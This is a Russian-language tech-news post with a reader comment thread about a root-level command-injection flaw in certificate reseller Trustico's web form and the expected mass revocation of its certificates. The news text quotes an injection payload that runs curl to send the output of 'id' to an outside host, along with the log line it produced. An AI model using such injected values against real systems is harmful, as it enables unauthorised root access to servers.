URL: https://www.opennet.dev/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 113715
[ Назад ]
Исходное сообщение
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено opennews , 02-Мрт-18 09:18
Вчерашняя история (https://www.opennet.dev/opennews/art.shtml?num=48166) с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из пользователей сервиса обнаружил (https://twitter.com/cujanovic/status/969229397508153350) тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.
Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.
Например, при вводе "$(curl http://1.2.3.4/`id`)" на указанный хост придёт запрос вида:
1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"
В настоящее время сайт Trustico (https://trustico.com) выведен из строя и недоступен. Представители удостоверяющего центра DigiCert и других партнёров Trustico пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва все выданных через Trustico сертификатов в течение 24 часов.
URL: https://www.reddit.com/r/sysadmin/comments/816t5f/trustico_w.../
Новость: https://www.opennet.dev/opennews/art.shtml?num=48176
Содержание
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:18 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,user, 12:27 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:19 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:24 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:21 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:22 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 10:15 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:07 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Michael Shigorin, 10:52 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:28 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Dmitry77, 00:35 , 04-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:42 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,A.Stahl, 09:23 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,commiethebeastie, 09:25 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:26 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,angra, 10:34 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 18:42 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:04 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:32 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:05 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:28 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,нах, 09:52 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,mickvav, 11:18 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 10:37 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 10:47 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:12 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:27 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Zlo, 11:40 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:47 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:57 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:44 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Дуплик, 13:40 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Дудосер, 14:15 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Некто, 14:16 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,ананас, 14:27 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Диалектик, 18:58 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 08:11 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,mumu, 16:54 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Некто, 17:10 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 19:23 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,кек, 21:31 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 22:23 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 23:10 , 02-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 00:17 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Ordu, 08:45 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:36 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 18:07 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Тот_Самый_Анонимус, 11:41 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Kuromi, 17:42 , 03-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Kuromi, 06:05 , 05-Мрт-18
- Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 03:23 , 06-Мрт-18
Сообщения в этом обсуждении
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 09:18
Что вы делаете, прекратите! Я попкорн уже не успеваю из аргентины подвозить
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено user , 02-Мрт-18 12:27
Из аргентинской муки нужно делать блины на лопате.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 09:19
"Гори-гори ясно, чтобы не погасло!"
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 09:24
> "Гори-гори ясно, чтобы не погасло!" Earth, Wind & Fire - Boogie Wonderland
Scooter - Fire
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 12:21
The roof
The roof
The roof is on fire
We don't need no water
Let the motherfucker burn
Burn, motherfucker, burn(C)
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 09:22
урок коррупционерам
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 10:15
я Вас умоляю, просто подкорректируют планы безотносительно к сути происшествия
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 11:07
разумеется, на пути жадности нет преград
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Michael Shigorin , 03-Мрт-18 10:52
> урок коррупционерам Это Вы про тот почтовый сервер Хиллари?
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 03-Мрт-18 13:28
Всем кто смеет хреново работать и раздолбайствовать.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Dmitry77 , 04-Мрт-18 00:35
Ну как сказать.. хреново работает - тот кто принимает стандарты. Например DNS. Сертификаты - это заплатка которая плохо держится.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 03-Мрт-18 13:42
Нет, про получателей отката от комода за переход к ним с дигисерта. Такое впечатление, что их в яслях или в школе врать не научили, и они наивно полагали, что просто так можно краденные серты предъявить.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено A.Stahl , 02-Мрт-18 09:23
Ну облажались. Бывает. Trustico это маленький посредник. Возможно там в штате 1 человек, он же хозяин-администратор-программист. Совершенно обычная ситуация. Ничего нового.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено commiethebeastie , 02-Мрт-18 09:25
>http://1.2.3.4/`id`CVSS 11?
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 09:26
Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные, но так как хорошие разработчики это ленивые, нетерпеливые, с завышенным самомнением, персонажи, то остаются только студенты и индусы.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено angra , 02-Мрт-18 10:34
>Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромныеА деньги есть только на студентов и индусов, так как почти все средства уходят на бонусы манагеров.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 18:42
Так снесите Бастилию )
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 11:04
> внимательные, трудолюбивые и скромныепослушные, согласные, умеющие в минимум полезных действий, внимание и трудолюбие ведут к убыткам
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 12:32
> внимание и трудолюбие ведут к убыткамВ стартапах, да. В энтерпрайзе наоборот.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 13:05
проблема в тех кто платит, не принёс новую звёздную идею - не достоин хорошего дохода.
как итог постепенно вся кропотливая работа сваливается на наиболее адекватного в условном отделе, а в какой-то момент он либо устаёт, либо просто уходит...
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 09:28
Уволенный из Equifax администратор, перешёл на работу в Trustico?
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено нах , 02-Мрт-18 09:52
уволенный поехал обратно в свою деревню под Бангалором, в трех тапках - два на ногах, один в жопе, проблема в том, что их в той деревне пол-миллиона, и треть уехали в Штаты по очень мягким визовым правилам. (вторая треть уехала в Европы с ближними Азиями)
тапок не хватит.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено mickvav , 03-Мрт-18 11:18
Вы так говорите, как будто чувак из мухосранска не мог админить оносайтик...
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 10:37
> Представители удостоверяющего центра DigiCert и других партнёров Trustico пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва все выданных через Trustico сертификатов в течение 24 часов.И не отреагируют, сколько мы ни будем ожидать.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 10:47
При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов. И мы конечно верим им на слово, да? Учитывая что во всем остальном они врали как сивый мерин и скрывали информацию до последнего.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 11:12
> И мы конечно верим им на слово, да?Я думаю, что эта фраза в конце новости подается просто для особого смака.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 11:27
в выигрыше остались те, кто доверился малозащищенному реселлеру - все они узнали, что скомпрометированы с приемлимой задержкой в границах TTT(time to trust).
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Zlo , 02-Мрт-18 11:40
Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач у всех остальных сертификаторов......прям совпадение.....
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 12:47
Не думаю
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 12:57
А сам letsencrypt можно рассматривать как монокультуру...
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 03-Мрт-18 13:44
> Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач
> у всех остальных сертификаторов......прям совпадение.....Это не совпадение, а следствие: комод теряет доход и пытается подмять остатки бизнеса на платных сертификатах.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Дуплик , 02-Мрт-18 13:40
Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Дудосер , 02-Мрт-18 14:15
А за щеку откладывать можно будет?
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Некто , 02-Мрт-18 14:16
> Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный. Ага! И все браузеры, использующие "HTTPSSS на блокчейне", в свободное время будут майнить не Monero, а подписи к транзакциям в этом блокчейне. Правильно! К чему столько вычислительной мощности CPU простаивает!
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено ананас , 02-Мрт-18 14:27
Да и ещё выкачивать уже подписанные сертификаты чтобы проверять локально
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Диалектик , 02-Мрт-18 18:58
Зачем самостоятельно что-то майнить? Вон возьми тот же блокчейн namecoin и используй нахаляву.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 03-Мрт-18 08:11
но ведь namecoin уже есть.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено mumu , 02-Мрт-18 16:54
> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.#$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной школы имеет под собой серьёзные аргументы.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Некто , 02-Мрт-18 17:10
>> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.
> #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной
> школы имеет под собой серьёзные аргументы.А еще "... они будут исполнены на сервере с правами root", что однозначно указывает, что их веб сервер работал под рутом!
Запрет на пользование интернетом до окончания начальной школы от таких уродов не спасет. Нужна юридическая норма на пожизненный запрет пользования компьютером.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 19:23
если форенсик сможет с убедительной вероятностью указать на конкретное лицо, с которым не будет некоторого рода проблем. а уж запрет пользования..
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено кек , 02-Мрт-18 21:31
>Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволовшел 2018 год...
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 22:23
Где то видел статью о том что дешевле быть взломанным чем тратить деньги на грамотных специалистов. Такова селяви
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 02-Мрт-18 23:10
Дешевле не значит выгоднее.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 03-Мрт-18 00:17
Еще дешевле вообще не заморачиваться с сайтами, не делать их вообще. Расходов ровно 0. Заодно и не сломают.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Ordu , 03-Мрт-18 08:45
Поэтому сейчас в США даже республиканцы задумываются о том, что сфера IT требует большего регулирования со стороны государства. Чтобы быть взломанным было бы дороже.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 03-Мрт-18 09:36
никто не застрахован от ошибок, можно учиться жить без компьютера, пока регулятор не утянул всех под лёд
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 03-Мрт-18 18:07
непонял, это как: "запретить взламывать" или "запретить быть взламываемыми"?
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Тот_Самый_Анонимус , 03-Мрт-18 11:41
В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Kuromi , 03-Мрт-18 17:42
А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.
Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Kuromi , 05-Мрт-18 06:05
> А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов
> от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация
> не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка
> - в мае.
> Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов
> на затронутых сайтах, наконец-то.И, само смешное, спустя пару дней включили назад.
"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Отправлено Аноним , 06-Мрт-18 03:23
Прекрасно! Находил такие дыры лет 12 назад много где, но не думал, что такое до сих пор встречается в чем-то серьезнее курсовых работ. :) Самое удивительное, что сэкономили на разработчиках те, у кого вообще затрат на ведение бизнеса почти по нулям - даже не продажа, а перепродажа воздуха. Жадность человеческая не имеет предела.